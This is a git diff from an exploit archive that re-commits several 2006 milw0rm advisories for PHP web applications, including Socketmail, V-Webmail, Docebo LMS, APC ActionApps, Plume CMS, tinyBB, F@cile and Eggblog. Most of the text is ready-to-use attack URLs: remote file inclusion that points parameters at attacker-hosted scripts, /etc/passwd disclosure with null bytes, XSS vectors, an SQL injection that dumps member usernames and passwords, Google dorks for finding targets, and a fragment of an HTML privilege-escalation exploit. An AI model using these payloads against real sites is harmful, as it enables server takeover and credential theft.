+http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts] + +#Elo ;-) + +# milw0rm.com [2006-05-25] diff --git a/platforms/php/webapps/1826.txt b/platforms/php/webapps/1826.txt index a711692a2..503d15aa2 100755 --- a/platforms/php/webapps/1826.txt +++ b/platforms/php/webapps/1826.txt 
@@ -1,18 +1,18 @@ -Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability ------------------------------------------------------------------ -Vendor: Creative Digital Resources -URL: http://socketmail.com ------------------------------------------------------------------ - -Credits: -Discovered by: 'Aesthetico' -http://www.majorsecurity.de ------------------------------------------------------------------ -Search for: "Powered by SocketMail" ------------------------------------------------------------------ - -Exploitation(tested with Lite-Edition and Pro-Edition): - -/index.php?site_path=http://www.yourspace.com/yourscript.php? - -# milw0rm.com [2006-05-25] +Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability +----------------------------------------------------------------- +Vendor: Creative Digital Resources +URL: http://socketmail.com +----------------------------------------------------------------- + +Credits: +Discovered by: 'Aesthetico' +http://www.majorsecurity.de +----------------------------------------------------------------- +Search for: "Powered by SocketMail" +----------------------------------------------------------------- + +Exploitation(tested with Lite-Edition and Pro-Edition): + +/index.php?site_path=http://www.yourspace.com/yourscript.php? + +# milw0rm.com [2006-05-25] diff --git a/platforms/php/webapps/1827.txt b/platforms/php/webapps/1827.txt index 671878688..00bac7c9d 100755 --- a/platforms/php/webapps/1827.txt +++ b/platforms/php/webapps/1827.txt 
@@ -1,19 +1,19 @@ -Script: V-Webmail 1.6.4 -Vendor: http://www.v-webmail.org/ -Description: V-webmail is a powerful PHP based webmail application with an -abundance of features, including many innovative ideas for web applications -Discovered: beford <xbefordx gmail com> -Vulnerable File - -v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php'); -v-webmail/includes/mailaccess/pop3.php => -require_once($CONFIG['pear_dir'] . 'Net/POP3.php'); - -Version 1.3 -http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil -http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil - -Version 1.5 - 1.6.4 -http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil - -# milw0rm.com [2006-05-25] +Script: V-Webmail 1.6.4 +Vendor: http://www.v-webmail.org/ +Description: V-webmail is a powerful PHP based webmail application with an +abundance of features, including many innovative ideas for web applications +Discovered: beford <xbefordx gmail com> +Vulnerable File + +v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php'); +v-webmail/includes/mailaccess/pop3.php => +require_once($CONFIG['pear_dir'] . 'Net/POP3.php'); + +Version 1.3 +http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil +http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil + +Version 1.5 - 1.6.4 +http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil + +# milw0rm.com [2006-05-25] diff --git a/platforms/php/webapps/1828.txt b/platforms/php/webapps/1828.txt index c39a57792..75a8b8413 100755 --- a/platforms/php/webapps/1828.txt +++ b/platforms/php/webapps/1828.txt 
@@ -1,18 +1,18 @@ -Vulnerable Script: Docebo LMS 2.05 -Discovered: beford <xbefordx gmail com> - -Noobs: %22Based+on+DoceboLMS+2.0%22 - -Vulnerable Files - -doceboLMS205/modules/credits/business.php => -include($_GET['lang'].'/language.php'); - -doceboLMS205/modules/credits/credits.php => -include($_GET['lang'].'/language.php'); - -doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php'); - -http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/? - -# milw0rm.com [2006-05-25] +Vulnerable Script: Docebo LMS 2.05 +Discovered: beford <xbefordx gmail com> + +Noobs: %22Based+on+DoceboLMS+2.0%22 + +Vulnerable Files + +doceboLMS205/modules/credits/business.php => +include($_GET['lang'].'/language.php'); + +doceboLMS205/modules/credits/credits.php => +include($_GET['lang'].'/language.php'); + +doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php'); + +http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/? + +# milw0rm.com [2006-05-25] diff --git a/platforms/php/webapps/1829.txt b/platforms/php/webapps/1829.txt index 44d48370f..8e3e7ae5e 100755 --- a/platforms/php/webapps/1829.txt +++ b/platforms/php/webapps/1829.txt 
@@ -1,183 +1,183 @@ -################ DEVIL TEAM THE BEST POLISH TEAM ################# -#APC ActionApps CMS (2.8.1) - Remote File Include Vulnerabilities -#Find by Kacper (Rahim). -#Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** -#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl -#site: http://sourceforge.net/projects/apc-aa/ -################################################################## -/* -cached.php3: -... (line:35) -require_once $GLOBALS['AA_INC_PATH']."locsess.php3"; -... - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -cron.php3: -... (line:47) -require_once $GLOBALS['AA_INC_PATH']."locsess.php3"; -... - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -discussion.php3: -... (line:80) -require_once $GLOBALS['AA_INC_PATH']."easy_scroller.php3"; -... - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -filldisc.php3: -... (line:75) -require_once $GLOBALS['AA_INC_PATH']."locsess.php3"; -... - -And more.......... 
;-) - -*/ - -expl: - -http://www.site.com/[APC_path]/cached.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/cron.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/filldisc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/filler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/fillform.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/go.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] -http://www.site.com/[APC_path]/hiercons.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/jsview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/live_checkbox.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/offline.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/post2shtml.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/search.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/slice.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/sql_update.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - - -/* -In Admin/ folder all files have: - -require_once "include/config.php3"; -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -include/config.php3: on line 79 - -require_once $GLOBALS['AA_INC_PATH']."mgettext.php3"; - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -only this file: logout.php3, prev_navigation.php3, preview.php3, dont -have this verbilities - -All can expl: - - -http://www.site.com/[APC_path]/admin/[any_file]?GLOBALS[AA_INC_PATH]=[evil_scripts] - - -*/ -in includes/ folder: - - -http://www.site.com/[APC_path]/include/auth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - 
-http://www.site.com/[APC_path]/include/constants.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/csn_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/event.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/event_handler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/extauth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/extauthnobody.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/feeding.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/fileman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/formutil.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/item.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/item_content.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/itemfunc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/itemview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/javascript.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/mail.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/mailman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/menu.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/notify.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/pagecache.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/perm_sql.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - 
-http://www.site.com/[APC_path]/include/profile.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/searchbar.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/searchlib.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/slicedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/sliceobj.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/slicewiz.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/stringexpand.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/tabledit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/tabledit_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/tv_email.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/tv_misc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/um_uedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/um_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/xml_fetch.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/xml_rssparse.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - -http://www.site.com/[APC_path]/include/zids.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] - - -/* -and more verbs in modules/ folder :) -*/ - -################################################################### -#Elo ;-) - -# milw0rm.com [2006-05-25] +################ DEVIL TEAM THE BEST POLISH TEAM ################# +#APC ActionApps CMS (2.8.1) - Remote File Include Vulnerabilities +#Find by Kacper (Rahim). 
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** +#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl +#site: http://sourceforge.net/projects/apc-aa/ +################################################################## +/* +cached.php3: +... (line:35) +require_once $GLOBALS['AA_INC_PATH']."locsess.php3"; +... + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +cron.php3: +... (line:47) +require_once $GLOBALS['AA_INC_PATH']."locsess.php3"; +... + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +discussion.php3: +... (line:80) +require_once $GLOBALS['AA_INC_PATH']."easy_scroller.php3"; +... + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +filldisc.php3: +... (line:75) +require_once $GLOBALS['AA_INC_PATH']."locsess.php3"; +... + +And more.......... ;-) + +*/ + +expl: + +http://www.site.com/[APC_path]/cached.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/cron.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/filldisc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/filler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/fillform.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/go.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] +http://www.site.com/[APC_path]/hiercons.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/jsview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/live_checkbox.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/offline.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/post2shtml.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/search.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + 
+http://www.site.com/[APC_path]/slice.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/sql_update.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + + +/* +In Admin/ folder all files have: + +require_once "include/config.php3"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include/config.php3: on line 79 + +require_once $GLOBALS['AA_INC_PATH']."mgettext.php3"; + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +only this file: logout.php3, prev_navigation.php3, preview.php3, dont +have this verbilities + +All can expl: + + +http://www.site.com/[APC_path]/admin/[any_file]?GLOBALS[AA_INC_PATH]=[evil_scripts] + + +*/ +in includes/ folder: + + +http://www.site.com/[APC_path]/include/auth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/constants.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/csn_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/event.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/event_handler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/extauth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/extauthnobody.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/feeding.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/fileman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/formutil.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/item.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/item_content.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + 
+http://www.site.com/[APC_path]/include/itemfunc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/itemview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/javascript.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/mail.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/mailman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/menu.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/notify.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/pagecache.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/perm_sql.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/profile.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/searchbar.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/searchlib.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/slicedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/sliceobj.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/slicewiz.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/stringexpand.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/tabledit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/tabledit_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/tv_email.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/tv_misc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/um_uedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + 
+http://www.site.com/[APC_path]/include/um_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/xml_fetch.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/xml_rssparse.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + +http://www.site.com/[APC_path]/include/zids.php3?GLOBALS[AA_INC_PATH]=[evil_scripts] + + +/* +and more verbs in modules/ folder :) +*/ + +################################################################### +#Elo ;-) + +# milw0rm.com [2006-05-25] diff --git a/platforms/php/webapps/1832.txt b/platforms/php/webapps/1832.txt index 67b2915b0..c161070a3 100755 --- a/platforms/php/webapps/1832.txt +++ b/platforms/php/webapps/1832.txt @@ -1,15 +1,15 @@ -Vendor: Plume CMS http://plume-cms.net -Vuln: Remote File Include -Discovered: beford <xbefordx gmail com> - -Vulnerable File/Code - -./plume-1.0.3/manager/frontinc/prepend.php - -[code] -include_once $_PX_config['manager_path'].'/conf/config.php'; -[/code] - -http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet - -# milw0rm.com [2006-05-26] +Vendor: Plume CMS http://plume-cms.net +Vuln: Remote File Include +Discovered: beford <xbefordx gmail com> + +Vulnerable File/Code + +./plume-1.0.3/manager/frontinc/prepend.php + +[code] +include_once $_PX_config['manager_path'].'/conf/config.php'; +[/code] + +http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet + +# milw0rm.com [2006-05-26] diff --git a/platforms/php/webapps/1835.txt b/platforms/php/webapps/1835.txt index 4b46d1e53..a9551fbd1 100755 --- a/platforms/php/webapps/1835.txt +++ b/platforms/php/webapps/1835.txt 
@@ -1,24 +1,24 @@ -################# DEVIL TEAM THE BEST POLISH TEAM ################## -# -# HOT [(Hot Open Tickets) (hot_11012004_ver2f)] - Remote File Include Vulnerabilities -# Find by Kacper (Rahim). -# Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** -# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl -# Site scripts: http://hotopentickets.sourceforge.net -# -#################################################################### -*/ lib_action_step.php: Line(1-4) - - include ($GLOBALS["CLASS_PATH"]."/User_list_class.php"); - function print_action_list($a) - { - -/* -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Expl: - -http://www.site.com/[hot_path]/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=[evil_scripts] - -#Elo ;-) - -# milw0rm.com [2006-05-27] +################# DEVIL TEAM THE BEST POLISH TEAM ################## +# +# HOT [(Hot Open Tickets) (hot_11012004_ver2f)] - Remote File Include Vulnerabilities +# Find by Kacper (Rahim). +# Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** +# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl +# Site scripts: http://hotopentickets.sourceforge.net +# +#################################################################### +*/ lib_action_step.php: Line(1-4) + + include ($GLOBALS["CLASS_PATH"]."/User_list_class.php"); + function print_action_list($a) + { + +/* +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Expl: + +http://www.site.com/[hot_path]/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=[evil_scripts] + +#Elo ;-) + +# milw0rm.com [2006-05-27] diff --git a/platforms/php/webapps/1839.txt b/platforms/php/webapps/1839.txt index 13fc11c12..bc54bc901 100755 --- a/platforms/php/webapps/1839.txt +++ b/platforms/php/webapps/1839.txt 
@@ -1,12 +1,12 @@ -tinyBB <= 0.3 Multiple Remote Vulnerabilities -Method found by nukedx, -Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com -This exploits works on tinyBB <= 0.3 -Original advisory can be found at: http://www.nukedx.com/?viewdoc=33 -http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt? -http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00 -SQL injection on login.php -http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing -# nukedx.com [2006-05-27] - -# milw0rm.com [2006-05-28] +tinyBB <= 0.3 Multiple Remote Vulnerabilities +Method found by nukedx, +Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com +This exploits works on tinyBB <= 0.3 +Original advisory can be found at: http://www.nukedx.com/?viewdoc=33 +http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt? +http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00 +SQL injection on login.php +http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing +# nukedx.com [2006-05-27] + +# milw0rm.com [2006-05-28] diff --git a/platforms/php/webapps/1841.txt b/platforms/php/webapps/1841.txt index ce16b2a3e..250eb9053 100755 --- a/platforms/php/webapps/1841.txt +++ b/platforms/php/webapps/1841.txt 
@@ -1,28 +1,28 @@ -F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities -Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com -This exploits works on F@cile Interactive Web <= 0.8x -Original advisory can be found at: http://www.nukedx.com/?viewdoc=35 -File Inclusion Vulnerabilities. -http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt? -http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00 -http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd -http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php <- php5 -http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd -http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php <- php5 -http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=/etc/passwd%00 -http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=/etc/passwd%00 -http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=/etc/passwd%00 -http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=/etc/passwd%00 -http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=/etc/passwd%00 -Cross Site Scripting. 
-http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=XSS&myskin=XSS -http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=XSS&myskin=XSS -http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=XSS&myskin=XSS -http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=XSS&myskin=XSS -http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=XSS&myskin=XSS -Information disclosure -http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00 - -# nukedx.com [2006-05-27] - -# milw0rm.com [2006-05-28] +F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities +Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com +This exploits works on F@cile Interactive Web <= 0.8x +Original advisory can be found at: http://www.nukedx.com/?viewdoc=35 +File Inclusion Vulnerabilities. +http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt? +http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00 +http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd +http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php <- php5 +http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd +http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php <- php5 +http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=/etc/passwd%00 +http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=/etc/passwd%00 +http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=/etc/passwd%00 +http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=/etc/passwd%00 +http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=/etc/passwd%00 +Cross Site Scripting. 
+http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=XSS&myskin=XSS +http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=XSS&myskin=XSS +http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=XSS&myskin=XSS +http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=XSS&myskin=XSS +http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=XSS&myskin=XSS +Information disclosure +http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00 + +# nukedx.com [2006-05-27] + +# milw0rm.com [2006-05-28] diff --git a/platforms/php/webapps/1842.htm b/platforms/php/webapps/1842.htm index 45475e3a2..4f3be2cbc 100755 --- a/platforms/php/webapps/1842.htm +++ b/platforms/php/webapps/1842.htm @@ -1,61 +1,61 @@ -<!-- -Eggblog <= 3.x Multiple Remote Vulnerabilities -Discovered by: nukedx -Contacts: ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: http://www.nukedx.com -Original advisory can be found at: http://www.nukedx.com/?viewdoc=36 -Eggblog <= 3.0.6 (rss/posts.php id) Remote SQL injection -Example -> http://[site]/[EggBlog]/rss/posts.php?id=1'/**/UNION/**/SELECT/**/0,concat('Username:%20',username),concat('Password:%20',password)/**/from/**/eggblog_members/* -This SQL injection will list you all users and passwords. ---> - -<html> -<title>Eggblog 2.x Remote Privilege Escalation - - - - - -
    -
    -Welcome to Eggblog 2.x Remote Privilege Escalation -This exploit has been coded by nukedx -You can found original advisory on http://www.nukedx.com/?viewdoc=36 -Dork for this exploit: inurl:"powered by eggblog" -Your target must be like that: www.victim.com/Path/ -The sites you found with given dork has like: www.victim.com/eggblog/home/ or www.victim.com/home/ -If the site has /eggblog/home in link your target must be www.victim.com/eggblog/ -For second example your target must be www.victim.com/ -You can login with your admin account via www.victim.com/eggblog/admin/index.php -Have phun -
    -Target -> - - - - - -
    -
    -
    -
    - - - -# milw0rm.com [2006-05-28] + + + +Eggblog 2.x Remote Privilege Escalation + + + + + +
    +
